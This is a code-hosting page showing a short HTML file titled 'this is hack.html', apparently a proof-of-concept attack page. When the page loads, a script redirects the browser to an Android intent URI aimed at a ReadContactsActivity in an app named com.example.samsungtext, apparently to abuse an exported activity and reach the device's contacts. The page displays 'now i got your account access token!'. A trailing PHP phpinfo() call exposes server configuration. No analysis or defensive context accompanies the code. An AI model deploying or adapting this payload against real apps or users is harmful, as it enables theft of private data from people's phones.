-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathindex2.html
30 lines (24 loc) · 900 Bytes
/
index2.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="Cache-Control" content="no-cache, no-store, must-revalidate" />
<meta http-equiv="Pragma" content="no-cache" />
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta http-equiv="Expires" content="0" />
<title>this is hack.html</title>
</head>
<body>
<p id="content">now i got your account access token!</p>
<br/>
<br/>
<br/>
<br/>
<script>
document.location.href='intent://com.android.contacts/contacts#Intent;scheme=content;action=android.intent.action.SEND;type=*/*;component=com.example.samsungtext/.ReadContactsActivity;S.android.intent.extra.TEXT=hello;end';
</script>
</body>
</html>
<?php
phpinfo();
?>